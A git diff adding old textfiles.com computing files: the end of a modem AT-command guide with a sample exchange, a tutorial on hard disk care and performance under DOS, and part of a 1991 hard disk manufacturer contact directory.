System +Products which specify this with S37). + +Any dependency on proper cabling can be eliminated by avoiding techniques that +depend on EIA 232-D signals: + +* Have the software scan for result codes, rather than depending on the +condition of the CD line + +* Transparent flow control should be used with V-Series System Products +rather than with RTS/CTS signals + +* The escape process and H command should be used to hang-up instead of +terminating a connection by dropping DTR + +* Any unexpected RING result codes may indicate the last command may not have +been processed correctly. The command should be-issued + + +Sample Controller/Modem Exchange + +Clock Controller Speed Modem +-------------------------------------------------------------------------- + (1200 bps) +00000 ATZ +00034 ATZ +00068 (one second to do reset) +01068 0 (V0 stored as + default) +01084 (delay additional 600ms) +01684 ATEQV1S0=0S12=10S4=3HI +01884 ATEQV1S0=0S12=10S4=3HI + (echo) +02084 960 +02142 OK + (19200 bps) +02192 ATM0X4L1S12=10S2=1&Q5W1S36 + =7S37=9&K5 +02206 OK +02209 ATDT9W14045551212 +38000 CARRIER 2400 +45000 PROTOCOL: NONE +45010 CONNECT 2400 + (2400 bps) + (Connection Established) + (2400 bps) +00000 (delay 300ms, need 200, + add 100 for safety) +00300 (escape char is ^A, S2=1) +00313 (waits 200ms) +00513 OK +00538 ATHE1S2=43S12=50W0&Q0 +00630 OK +------------------------------------------------------------------------ + +END \ No newline at end of file diff --git a/textfiles.com/computers/hd.txt b/textfiles.com/computers/hd.txt new file mode 100644 index 00000000..1075785e --- /dev/null +++ b/textfiles.com/computers/hd.txt @@ -0,0 +1,486 @@ + + ---------------------------------------------------------------- + + HARD DISKS - THE ESSENTIAL ACCESSORY + + ---------------------------------------------------------------- + + A simple observation: the first accessory any computer user + should buy is hard drive. On a dollar for dollar basis nothing + speeds up processing and expands convenience like a hard drive. + The bad news? The substantial storage capacity of a hard drive + contains the seeds of data catastrophe if you don't understand + how to CAREFULLY maintain a hard drive. Some reference + information pertaining to larger desktop hard drives as well as + smaller laptop drives has been retained since drives in both + computers are similar in function although different in form and + size. + + Many computer operations tend to slow down at the critical + bottleneck of information transfer from computer memory (RAM) to + disk. The faster the transfer, the faster the program operates. + Nine times out of ten it is the bottleneck formed when + information flows to or from a disk that you and your program + must wait. This is where a hard drive really shines - speed. + + Given the best possible treatment, a hard drive should last from + eight to fifteen years. Drive manufacturers typically suggest + 30,000 to 70,000 hours of routine life for a hard drive before + failure. If you kept your PC on for a 40 hour work week for 50 + weeks - you could expect about 15 years of service for a drive + rated at 30,000 hours. Some hard drive users even suggest + leaving the drive on continuously or alternatively turning it on + in the morning and off at night to minimize motor and bearing + wear since it is the starting shock which wears most heavily on + a drive. However, given marginal treatment or abuse, you can + expect about fifteen minutes of service followed by a $250 + repair bill. Obviously a little information about hard drives + and their care can't hurt. + + ---------------------------------------------------------------- + + TECHNOLOGY 101 - BOOT CAMP FOR HARD DRIVE USERS + + ---------------------------------------------------------------- + + What is a hard drive? If you have worked with a floppy disk you + already understand something about hard drives. Basically the + hard drive unit is a sealed chamber (sealed against dust and + dirt) which contains rapidly spinning single or multiple stacked + platters. The platter(s) are similar to a floppy disk in that + they store information magnetically - data can be erased and + rewritten as needed. The trick is, however, that the storage + capability is immense on a hard drive. + + A floppy typically holds about one third of a million computer + characters (360,000 or 360K bytes). The hard drive can commonly + hold 20 to 40 million (or more!) bytes or computer words. In + addition, the hard drive motor spins the magnetic platter + quickly so that information is transferred rapidly rather than + the tedious rate of the leisurely spinning floppy. A small + read/write head hovers and moves above the hard drive magnetic + platter much like a phonograph needle above a record. The + difference is that the read/write head of the hard drive rides + slightly above the platter on a thin cushion of air. In the + floppy drive mechanism, the read/write head is in direct contact + with the floppy. All hard drives are installed in two parts: the + drive (a box containing the disk and read/write head) and the + controller (a circuit board) which may be integrated into the + drive or a separate circuit board. The hard drive stores the + information. The controller assumes the role of a high speed + "translator/traffic cop" to help the hard drive move its massive + amount of information smoothly. + + Back to the magnetic platter for a moment. The read write heads + are mounted on a moveable arm and each position of the head + above the platter defines a circular TRACK just like the track + of a phonograph record. As the arm changes positions, different + circular tracks are traced magnetically upon the surface of the + platter. Most hard drives have several read/write heads which + service both the top and bottom of each platter. A set of tracks + on different platters define a vertical CYLINDER somewhat like + the surface of a tin can whose top and bottom are missing. Large + hard drives can have six or more platters and therefore 12 or + more sides for information storage. The tracks can also be + defined as divisions of equally divided data called SECTORS + which are something like portions of the outer edge of a circle. + Finally, the sum collection of tracks, sectors and cylinders + define the entire VOLUME of the hard disk. + + Each piece of data has an address which tells the read/write + heads where to move to locate that specific piece of + information. If you tell the read/write heads to move to and + hover over a specific track, sooner or later your data will pass + beneath it. Since you can move the heads directly to a given + track quickly, the early nomenclature for a hard drive was the + DASD or DIRECT ACCESS STORAGE DEVICE. + + Movement of the read/write head arm takes a little time. For + this reason an ACCESS TIME is associated with hard drives and + stated in advertising and specification sheets. Generally this + time is stated as the AVERAGE ACCESS TIME and is frequently in + the thousandths of seconds or millisecond range which is fast + indeed. The old IBM XT class machines featured access times + around 85 milliseconds with the AT class machines featuring + access times around 40 seconds. Newer hard drives post times in + the 28 to 15 millisecond access range. Remember, the faster you + can move the read/write heads, the faster you can get to your + data. + + The AVERAGE WAIT TIME is a less frequently discussed number but + equally interesting. Once the read/write head is positioned over + the track holding your data, the system must wait for the + correct sector to pass beneath. Obviously, the average wait time + is one half the time it takes for a full rotation of the + platter. This figure is rarely given in advertisements and is + usually comparable for most drives of the same type and is + generally much shorter than the access time. Speed matters to a + hard drive! Average wait time is published if you dig it out of + the specification sheet or write to the manufacturer. + + An extension of this logic brings us to consider the INTERLEAVE + FACTOR for a disk. Generally a hard drive reads and writes + information in sectors of the same, repeatable size such as 512 + bytes. However programs and data files are usually much bigger + than this and obviously must be scattered onto many sectors. The + problem is that the disk rotation is much too fast for a large + file to be written in perfectly contiguous sectors on the same + track. If you tried to write the data onto a track, one byte + after the next, the central processing unit chip or CPU could + not absorb the data fast enough. + + The solution is to place sectors to be read in ALTERNATING + fashion which gives the CPU time to digest the data. Thus if a + circular track on the platter had 8 sectors you might number and + read them in this order: 1,5,2,6,3,7,4,8. This way the CPU has a + "breather" in between each sector read. The number of rotations + it takes the heads to read ALL tracks in succession is the + INTERLEAVE FACTOR. Slow CPU chips can force a disk to use an + interleave factor of 3 or even 4. A faster processor might be + able to handle a disk interleave of 1:2 (such as 80286 processor + chips) or even 1:1 (such as 80386 processor chips.) It is + possible to low level format a disk and change its interleave + factor; but if the CPU cannot keep up, the adjustment is + worthless. To the processor operating in millionths of a second, + the time drain of waiting for a hard drive which operates in + thousandths of a second or floppy drive which operates in tenths + and full seconds is wasted time. The obvious point of logic is + that when using a hard drive you need to organize files for + minimum time delays for the processor. + + The first outer track on a disk is always the boot record which + loads the main portions of DOS into the machine. Following this + is the file allocation table or FAT which we discussed in + earlier tutorials. The FAT maintains data in CLUSTERS which, for + an XT class machine are 4096 bytes. On the AT class machine the + cluster size is 2048 bytes which is much more efficient and less + wasteful of disk space. Following the FAT are the sectors for + the root directory of the hard drive. Each directory entry is 32 + bytes in length. Curiously, and to our good advantage, unused + entries in the directory have a unique first character byte. + When a file is deleted though DOS, ONLY the first character is + reset. + + Fortunately this allows various utility programs to attempt to + recover the deleted file since ONLY the directory data is + altered but NOT the file itself. However, as time goes on and + additional files are added to the disk, the original file is + overwritten by new information. This is why you need to act + immediately if you discover you have accidentally deleted a + file. An advantage to the use of the FAT is that files do not + have to be given a fixed amount of space on a disk - they can + use as many or few clusters as needed. The downside is that the + file pieces can be scattered wildly over the surface of the disk + in a non contiguous fashion which only the FAT can track. This + means more read/write head motion and more wasted time as far as + the CPU and the performance of your program is concerned. + + Additionally, if you have many deleted files within the + directory, DOS must search tediously through each one from top + to bottom of the directory to find a match for the file you are + trying to locate. Obviously, then, programs and data of high use + should have their directory entries located near the top of the + directory to speed the search. Each time the read/write head + moves takes time: searching the directory and finding the pieces + of the scattered file all take movement of the read/write arm. + There are several ways to unfragment files which boost disk + performance, and we'll talk about those techniques it a bit. + + ---------------------------------------------------------------- + + HARD DISKS - STRATEGIES FOR TURBOCHARGED RESULTS + + ---------------------------------------------------------------- + + Before we examine methods for improving hard drive performance, + several simple "care and feeding" precautions should be + mentioned. + + Hard drives are touchy if mistreated! Once brought up to speed, + a hard drive should never be bumped or moved. The read/write + head (similar to the phonograph needle resting on a record) will + smash or chip into the surface of the spinning hard drive + platter and take your data with it. Either the head or the + magnetically coated platter can be permanently damaged. Allow + the hard drive to some to a complete stop before moving the + computer. + + In addition always use a "parking" software package to move the + read/write head to the safety zone before turning off the + computer. A parking program usually accompanies most computers + which have hard drives installed or can be obtained from + commercial or shareware sources. A few drives automatically park + the heads when turned off but this tends to be a rare feature + seen mostly on high priced hard drives. + + Always maintain copies of data and programs outside the hard + drive by "backing up" onto a floppy or tape. How often should + you back up your files? Daily if you use the computer to produce + many changes to important documents. Weekly backup is probably a + bare minimum considered reasonable for occasional computer + users. Other computer users maintain vital data on floppies or + other backup systems and use the hard drive to store programs or + applications only such as a spreadsheet or database. Backups are + a good idea even for floppy disk systems which have no hard + drive. + + Make two copies of every file regardless of whether you have a + hard drive or not. Some shareware and commercial utilities ease + the backup chore by only copying those files to a floppy which + have been changed or updated since the last backup has been + performed. They ignore files which have not changed and thus do + not require copying again. This can save a lot of time when + backing up valuable files from your hard drive to a floppy for + safekeeping. + + Hard drives should periodically be reorganized (files + unfragmented) to ensure speedy retrieval and access to data. + Inexpensive or free software programs known as "disk file + unfragmenters" do this job nicely. As disk files are created and + deleted, blank spaces and unused sectors begin to build up. + + Gradually files are broken into pieces and scattered over the + many tracks and sectors of the disk. This happens to both + floppies and hard drives, but is especially annoying on hard + drives because of the dramatic increase in time it takes to load + a program or data file. The File allocation table is the + culprit, sense all data is packed away in the first and handiest + sector on the drive which the FAT can find. + + The FAT allows files to be fragmented down to the cluster level. + One way to unfragment a disk is to copy all of the files off to + floppies and then recopy them back to the hard drive - a tedious + nuisance at best. You would do this with the DOS XCOPY or COPY + commands but not DISKCOPY since this would retain the tracks and + their fragmentation as you first found them. + + Defragmenting programs perform this task without requiring + removal of the files from the hard drive. They perform their + magic by moving around the clusters of a scattered file in such + a way as to reassemble it into contiguous pieces again. Some + customization is permitted with the more sophisticated + "defragmenting" programs. For example, subdirectory files can be + relocated after the root or below a different subdirectory or, + in another example, high use files might be placed higher in the + directory listing for faster disk access. + + The first time a defragmenting program is run may require + several hours if a hard drive is large and badly fractured with + scattered files and clusters. It is a good idea to backup all + essential files prior to "defragging" just in case there is a + power failure during a long "defrag". Subsequent runs of the + "defragger" produce runs of only a few minutes or so since the + heavy work was done earlier. Essentially, "defragging" the hard + drive should be done regularaly, perhaps weekly. Defragging is + not a substitute for caching, ramdisks, or buffer - instead it + is a maintenance function which should be done regularly. + + Yet another possible avenue to improve disk performance is that + of changing the disk interleave factor which we will discuss a + bit later in this tutorial. By way of brief introduction: the + disk interleave indicates how many revolutions of the magnetic + platter are required to read all the sectors of data from the + spinning track. A ratio of 1:1 means all data can be read + sequentially. One sector of data after another. + + There is some overhead time required for the read/write head to + zip to the FAT area of the disk (if it is not in a cache or + buffer) to determine location of the next sector along the disk + track. + + For example, five clusters of data on a track might require four + trips back to the FAT track to find the cluster addresses even + on a completely defragmented disk. We will talk more about + cluster and defragmenting a bit later in this tutorial. + + Nevertheless, depending on the speed of your central processor + or CPU, using a program which tests and alters the interleave + factor, IF THIS CAN BE DONE, may yield better performance. Most + interleave adjustment software first performs a test to + determine the current interleave, the possible changes and of + course how much performance time might be gained. A few of these + packages can alter the interleave with the files in place but + you should backup truly essential files before starting the + process. Interleave factor adjustment are mainly derived from + the CPU speed NOT the disk speed. Thus a fast AT or 80386 + equipped machine will more likely be able to take advantage of + an interleave adjustment. + + Tinkering with a hard drive for optimum results might best be + divided into two categories: DISK SUBSTITUTION and DISK + ALTERATION. DOS allows two clever ways substituting RAM memory + for disk memory. + + In the first, using BUFFERS, the small CONFIG.SYS file on your + hard drive is modified to contain a buffers statement. A sample + might be: BUFFERS=20. A DOS buffer is an area of RAM memory + capable of holding a 512 byte mirror image of a disk sector. + This allows DOS to quickly search the buffer area for frequently + used data instead of the slower disk. In the older XT class + machine, if you did not specify a buffer size, DOS defaulted to + 2 buffers while later versions of DOS default to about 10 + buffers. Most users settle on about 20 buffers but you can + specify up to 99 with current releases of DOS. But you don't get + something for nothing. If you used the full 99 buffers + available, you would soak up 45K of your main RAM memory! The + downside of using buffers is that more is not necessarily + better. + + Unfortunately, DOS searches the buffer area of RAM sequentially + rather than logically so if DOS requires data which is in the + buffer area, it will search each 512 byte area in sequence from + top to bottom even though the data it needs may be at the end of + the buffer. Logically, then, there is an optimum number of + buffers - too many used with a small program and you can slow + things down, not enough and DOS will be forced to go out to the + disk to retrieve what it needs. If you rarely use the same data + within a program twice but load lots of different programs and + data, a large number of buffers won't help. However if you need + frequent access to a certain data file or portion of that file, + buffers will help. Portions of the FAT are kept within the + buffers area, so dropping your buffers to zero has the damaging + effect that DOS must always go to the disk to read the FAT which + isn't helpful either. + + Another way of substituting RAM memory for disk memory involves + using a RAMDISK. The idea is to create in RAM memory an entire + disk or a small portion of a disk. This works like magic on many + machines since the reading of tracks and sectors takes place at + the high speed of RAM memory rather than the mechanically + limited speed of the read/write heads on a floppy or hard drive. + + But be careful. Three areas of difficulty can arise. First you + must remember to take the data from a floppy or hard drive and + move it into the RAMDISK. Many people do this automatically from + within an AUTOEXEC.BAT file or may have several floppies, each + with a different RAMDISK configuration depending on the task at + hand. Copying data to the RAMDISK usually moves along briskly. + Secondly you must sacrifice a large area of memory for the + RAMDISK which can no longer be used by your main program. Users + of computers with extended or expanded memory usually choose to + put their RAMDISK in the extended or expanded memory area of RAM + so that precious main memory is not lost. Still, a small RAMDISK + can soak up 64K of RAM memory and one or two MEG RAMDISKS area + common for many users. The third and most serious problem when + using RAMDISKS is that they are volatile - switch off the + machine or experience a power failure, and your data is lost + forever! Rather than residing safely on a magnetic disk, the + data is "floating" in RAM memory and should be - MUST BE! - + written to a disk before the machine is powered down. + + Many applications fly with a RAMDISK. Users of word processors + find that moving the spelling checker and thesaurus to the + RAMDISK speeds up things considerably since these are used + heavily in a random manner. Spreadsheet users find that reading + and writing short data files to RAMDISKS is a boon. Programs + which use overlay files or temporary files as well as + programming compilers benefit from RAMDISK use. Batch files + which are disk intensive as well as small utilities really + sprint when placed on a RAMDISK. Basically, any program file + which is frequently used and loaded/unloaded repeatedly to a + disk during normal computer operation is an excellent candidate + for RAMDISK placement. DOS contains a RAMDISK which is called by + using the statement DEVICE=VDISK.SYS or DEVICE=RAMDRIVE.SYS (if + you are using MSDOS) which is placed in your CONFIG.SYS file. + Your DOS manual details the specifics such as stating the size + of RAMDISK and giving it a drive letter. You must still copy + your target files into the RAMDISK and place it in the search + path (with the PATH= command) as we mentioned in a previous + tutorial. And the RAMDISK should always be the first drive + letter mentioned in the path command so that DOS searches it + first for optimum results. + + Yet another area of investigation is that of CACHE software. + Essentially a CACHE is an extension of the buffers idea we + discussed earlier. But the twist is that the CACHE is searched + intelligently by a searching algorithm within the CACHE software + rather than from top to bottom as with the more typical DOS + buffer search system. Disk CACHE software can be obtained as + either commercial software or shareware. As with a RAMDISK, the + CACHE requires a chunk of RAM memory to operate. This can be + extended memory, expanded memory or main RAM memory. Some + manufacturers include a CACHE program with the software package + or DOS disk. A CACHE is a sophisticated type of RAMDISK, in a + rough sense. + + CACHE software allocates a large area of memory for storage of + frequently used disk data. This data is updated by an + intelligent CACHE search algorithm in an attempt to "guess" + which tracks of a disk you might read or need next. The CACHE + also stores the most frequently used disk data and attempts to + remove less frequently used data. Whenever DOS requests disk + data, the CACHE software first tries to fill the order from data + currently stashed in the CACHE which prevents a slower disk + search. + + When data is written from the program to the CACHE, first a disk + write is done to prevent data loss in case of power failure and + then the data is stashed in the CACHE in case it is needed + again. Usually the hard drive data is the target of the CACHE + activity, but a floppy disk could also be cached. All CACHE + software allows you to allocate the size of the CACHE as well as + the drive or drives to be cached. And some even allow you to + specify exact files or data to be cached. The key is that high + use data lives in RAM memory which keeps tedious disk access + times low. In general, if your computer has a megabyte or more + of memory and a speedy processor such as an 80286 or 80386 + either or both a CACHE or RAMDISK option does improve + performance. + + As we leave hard disk boot camp, let's finally look at hard + drive formatting processes. Two basic formatting operations are + of concern: physical formatting or low level formatting and + logical or high level formatting. When you use the format + program on a floppy disk both low level and high level + formatting is accomplished. On a hard disk, formatting performs + only logical or high level formatting. On a hard disk, low level + formatting is usually done to a disk before shipment. As an + aside, the FDISK command of DOS has little to do with either + type of formatting, but is a method of partitioning or arranging + the data onto the hard drive tracks. Each disk platter is + separated into circular concentric tracks where data is stored + as we saw earlier. During physical formatting the tracks are + divided into further subdivisions called clusters and further + yet into sectors. High level formatting involves the specific + ordering of the space for the exclusive use of DOS and is a bit + more analogous to the formatting of a floppy disk. + + Some software programs of use by hard drive owners: + + The following two programs perform low level formatting and + simple diagnostic routines on a hard drive: + + Disk Manager and CheckIt + + Data recovery and "unerasing" programs also containing + diagnostic routines are: + + PC Tools Deluxe, Norton Utilities, Mace Utilities + + Extensive diagnostic and maintenance/data repair functions as + well as interleave alteration and head parking are offered by: + + SpinRite II, Optune, Disk Technician + + Shareware programs with unerase functions include: + + Bakers Dozen + + Shareware programs with defragmentation capabilities include: + + SST and PACKDISK. + + Tutorial finished. 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WATTS LINE: + 1740 Army Street PAY PHONE:(415)550-2900 + San Francisco CA 94124 FAX LINE: + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + JCT WATTS LINE: + PAY PHONE: + FAX LINE: + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + KALOK Corporation WATTS LINE: + 1289 Anvilwood Avenue PAY PHONE:(408)747-1315 + Sunnyvale CA 94089 FAX LINE:(408)747-1319 + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + KYOCERA ELEC.Inc, Memory Prod.Div. WATTS LINE: + 8611 Balboa Avenue PAY PHONE:(619)576-2702 + San Diego CA 92123-1580 FAX LINE:(619)492-1456 + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + LAPINE TECHNOLOGY WATTS LINE: + PAY PHONE: + OUT OF BUSINESS FAX LINE: + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + MAXTOR COLORADO Corp. (MINISCRIBE) WATTS LINE:(800)356-5333 + 1861 Lefthand Circle PAY PHONE:(303)651-6000 + Longmont CO 80501-6798 FAX LINE:(303)678-2165 + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + MAXTOR Corporation WATTS LINE: + 211 River Oaks Parkway PAY PHONE:(408)432-1700 + San Jose CA 95134 FAX LINE:(408)433-0457 + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + MEGADRIVE SYSTEMS, Inc. WATTS LINE:(800)327-4744 + 1900 Ave of the Stars,Ste.2870 PAY PHONE:(213)556-1663 + Los Angeles CA 90067 FAX LINE:(213)556-1164 + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + + + + þ + + + HARD DISK DRIVE MANUFACTURER DIRECTORY + + 1/03/91 THEREF(tm) Version 4.1 PAGE 4 + ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ + MEMOREX Corporation WATTS LINE: + 611 South Milpitas Blvd. PAY PHONE:(408)957-1000 + Milpitas CA 95035-5473 FAX LINE: + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + MICRO MEMORY, Incorporated (MMI) WATTS LINE: + 9540 Vassar Avenue PAY PHONE:(818)998-0070 + Chatsworth CA 91311 FAX LINE: + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + MICRONET COMPUTER SYSTEMS, Inc. WATTS LINE: + PAY PHONE:(714)739-2244 + Buena Park CA FAX LINE: + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + MICROPOLIS Corporation WATTS LINE: + 21123 Nordhoff Street PAY PHONE:(818)709-3300 + Chattsworth CA 91311 FAX LINE:(818)709-3396 + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + MICROSCIENCE INTL. Corporation WATTS LINE: + 90 Headquarters Drive PAY PHONE:(408)433-9898 + San Jose CA 95134 FAX LINE: + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + MITSUBISHI ELECTRONICS AMERICA,Inc. WATTS LINE: + 991 Knox Street PAY PHONE:(213)217-5732 + Torrance CA 90502 FAX LINE:(213)324-6466 + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + NCR Corporation WATTS LINE: + 3718 North Rock Road PAY PHONE:(316)636-8000 + Wichita KS 67226 FAX LINE: + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + NEC TECHNOLOGIES, Inc. WATTS LINE:(800)343-4419 + 1414 Massachusetts Avenue PAY PHONE:(508)264-8000 + Boxborough MA 01719 FAX LINE: + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + NEWBURY DATA WATTS LINE: + 6 New England Executive Plaza PAY PHONE:(617)723-9513 + Burlington MA 01803 FAX LINE: + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + OKIDATA WATTS LINE: + 532 Fellowship Road PAY PHONE:(609)235-2600 + Mount Laurel NJ 08054 FAX LINE: + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + OLIVETTI, USA WATTS LINE: + PAY PHONE:(201)526-8200 + FAX LINE: + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + OPTIMA TECHNOLOGY Corp. WATTS LINE: + 17526 Von Karman PAY PHONE:(714)476-0515 + Irvine CA 92714 FAX LINE: + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + + + + þ + + + HARD DISK DRIVE MANUFACTURER DIRECTORY + + 1/03/91 THEREF(tm) Version 4.1 PAGE 5 + ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ + ORCA TECHNOLOGY Corp. WATTS LINE: + 1751 Fox Drive PAY PHONE:(408)441-1111 + San Jose CA 95131 FAX LINE: + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + OTARI Corporation WATTS LINE: + 378 Vintage Park Drive PAY PHONE:(415)341-5900 + Foster City CA 94404 FAX LINE: + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + PACIFIC MAGTRON, Incorporated WATTS LINE:(800)828-2822 + 568 Weddell Drive PAY PHONE:(408)774-1188 + Sunnyvale CA 94089 FAX LINE: + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + PANASONIC INDUSTRIAL Company WATTS LINE: + 1600 McCandless Drive PAY PHONE:(408)262-2200 + Milpitas CA 95035 FAX LINE:(408)262-4214 + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + PERIPHERAL LAND, Inc. WATTS LINE:(800)288-8754 + 47421 Bayside Parkway PAY PHONE:(415)657-2211 + Fremont CA 94538 FAX LINE: + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + PERIPHERAL TECHNOLOGY, Inc. (PTI) WATTS LINE: + 685 East Cochran PAY PHONE:(805)581-1000 + Simi Valley CA 93065 FAX LINE: + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + PRAIRIETEK Corporation WATTS LINE:(800)825-2511 + 1830 Lefthand Circle PAY PHONE:(303)772-4011 + Longmont CO 80501 FAX LINE:(303)651-3235 + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + 